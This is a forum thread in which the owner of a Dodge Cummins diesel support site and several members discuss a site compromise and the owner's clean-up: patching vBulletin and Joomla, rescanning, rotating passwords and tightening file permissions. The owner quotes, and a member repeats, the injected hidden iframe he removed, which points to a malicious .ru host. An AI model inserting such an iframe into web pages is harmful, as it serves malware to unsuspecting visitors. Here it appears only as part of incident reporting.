Jump to content

  • Welcome To Mopar1973Man.Com LLC

    We are a privately owned support forum for the Dodge Ram Cummins Diesels. All information is free to read for everyone. To interact or ask questions you must have a subscription plan to enable all other features beyond reading. Please go over to the Subscription Page and pick out a plan that fits you best. At any time you wish to cancel the subscription please go back over to the Subscription Page and hit the Cancel button and your subscription will be stopped. All subscriptions are auto-renewing. 

www.mopar1973man.com - HACKED

hex0rz

By hex0rz,
in Mopar1973Man Forum & Articles

 Share

Recommended Posts

hex0rz

hex0rz

Posted
Posted

Alright, so I'm starting to get warnings, alerts, blocks to the site. I have had windows defender and AVG warn me that the site is unsafe and it could potentially reveal personal or financial information. AVG gave me a 1889 number.Mike, might be time to look into this...

Link to comment
Share on other sites
Gamble

Gamble

Posted
Posted

Mike,

Can you receive text with pics on the listed number? I have a picture of it to send to you.

- - - Updated - - -

Nevermind, I will get it on here.

- - - Updated - - -

Here you go. I am a member on a local site that had the same issue awhile back, I am friends with the owner of it and I will try to make contact with him to see if there was a fix or a problem for that matter.

Posted Image

Link to comment
Share on other sites
  • Owner
Mopar1973Man

Mopar1973Man

Posted
  • Owner
Posted

Site has been hacked... :banghead: But I got the code out of it. 

<iframe src="http://lemonadiom.ru:8080/forum/links/news.php"></iframe>
If you run across more let me know. I'm going to call my hosting provider. UPDATE: Nothing basically they can do they assume its a weakness in my site somewhere and need to update everything. Yes my Joomla is a few sub versions behind and the vBulletin is due for 4.2.1 as soon as its released. So hang in tight gang.. Please give me any information if you find more...
Link to comment
Share on other sites
hex0rz

hex0rz

Posted
  • Author
Posted

Site has been hacked... :banghead: But I got the code out of it. 

<iframe src="http://lemonadiom.ru:8080/forum/links/news.php"></iframe>
If you run across more let me know. I'm going to call my hosting provider. UPDATE: Nothing basically they can do they assume its a weakness in my site somewhere and need to update everything. Yes my Joomla is a few sub versions behind and the vBulletin is due for 4.2.1 as soon as its released. So hang in tight gang.. Please give me any information if you find more...
SEE! I'm not crazy! :tease:
Link to comment
Share on other sites
  • Owner
Mopar1973Man

Mopar1973Man

Posted
  • Owner
Posted

SEE! I'm not crazy! :tease:

Ok... So I'm busted... UPDATE: Installing vB 4.2.0 Patch level 3. I think they gain entry through the Joomla and managed to hack the index.htm. But Also the article database is ringing red flags too so I assume that where the hacker managed to get in. So I'll get the update hammer into that next. I'm going to work hard and long tonight to harden the site up again. (#%&) Hackers... Grrr...
Link to comment
Share on other sites
  • Owner
Mopar1973Man

Mopar1973Man

Posted
  • Owner
Posted

UPDATE: Both vBulletin (4.2.0 PL3) and Joomla (2.5.7) are up to date as of now. articles.mopar1973man.com Joomla still reports two issues with crashing PHP files but no malware detected. http://sitecheck.sucuri.net/results/articles.mopar1973man.com forum.mopar1973man.com - Reports clean - http://sitecheck.sucuri.net/results/forum.mopar1973man.com www.mopar1973man.com - Reports Clean - http://sitecheck.sucuri.net/results/www.mopar1973man.com srrfd.mopar1973man.com - Reports Clean - http://sitecheck.sucuri.net/results/srrfd.mopar1973man.com Let me know gang... Thank you guys for reporting this. I just never thought I would be a target for hackers but I guess its time to thank my lucky stars it was mild and nothing out outrageous occurred. So I'll be putting everything else on the back burner for now and putting priority on site security and going to harden the server even more. Dang Hackers... Where is my virtual 9mm's??? :gun::mad:

Link to comment
Share on other sites
  • Owner
Mopar1973Man

Mopar1973Man

Posted
  • Owner
Posted

Russ its just like my Google Webmaster scan were clean too. But once 2 people come forward claiming the same thing and showing me the same problem with 2 different softwares now I've got a problem and have to act. Someone manage to inject that small piece code that suppose to carry a payload of malware. Once again since I'm already on Ubuntu Linux and so is the site neither one can directly see the payload nor can be effected by the payload. But you Windows user would be affect by it. So like what occurred I acted when 2 came forward claiming the same issues.

Link to comment
Share on other sites
  • Owner
Mopar1973Man

Mopar1973Man

Posted
  • Owner
Posted

Well I've been over this server with a fine toothed comb and I'm pretty sure I closed up any holes so far. Changed a few file security permissions to hopefully thwart any would-be hacker from trying that same stunt twice.Also going to perfect my backup system a bit more to get copies of the site on a regular basis.

Link to comment
Share on other sites
  • Owner
Mopar1973Man

Mopar1973Man

Posted
  • Owner
Posted

Ok gang. There will be some serious changes made to the site. Mostly things you guys can't see but I can. Like I'm going to be changing all the passwords to the MySQL databases, hosting passwords, FTP passwords, etc. I'm going to go for super strength stuff here. (64 character or better!) Yes it going to long ones. The kind of stuff you create a text file and cut and paste them back and forth.As for the forum I'll bee changing a few folders around to prevent hackers from figuring out where the control panels are for the staff and myself.Then I'll be double checking all the file permissions to be sure there wasn't a folder or file left open to the public to read/write to by accident.

  • Like 1
Link to comment
Share on other sites
  • Owner
Mopar1973Man

Mopar1973Man

Posted
  • Owner
Posted

Ok Gang... (Whew!) I managed to change all the passwords on the site. Every MySQL database has a different password now. Even the FTP login for myself has been changed. Been through most all the files and got most of them changed to tighter security policies of read only for most. Double check all the configuration files to be sure they are not public readable. (404 page error). If there is any problems that pop up because of changes please let me know. I might of over tighten the leash... :rolleyes:

keep that file on a thumbdrive only, thats secure! :) thanks again mr IT man!!!

How about burning it to a DVD-RW and calling it good.. :wink:
Link to comment
Share on other sites
 Share
Go to topic listing

Rate The Author

Please take the time and give the author a 1 to a 5-star rating for the information you have gained from anywhere on the website. All forum threads, articles, etc. If a members post is good information please don't forget to tell them "Thanks" or "Like"

Rate Us On Google

Please take the time and visit our Google Review page and give us a review of our services.

Tip Jar

If Mopar1973Man.Com has helped you with quick and timely information for your repair please consider tossing a tip in the Tip Jar

×
×
  • Create New...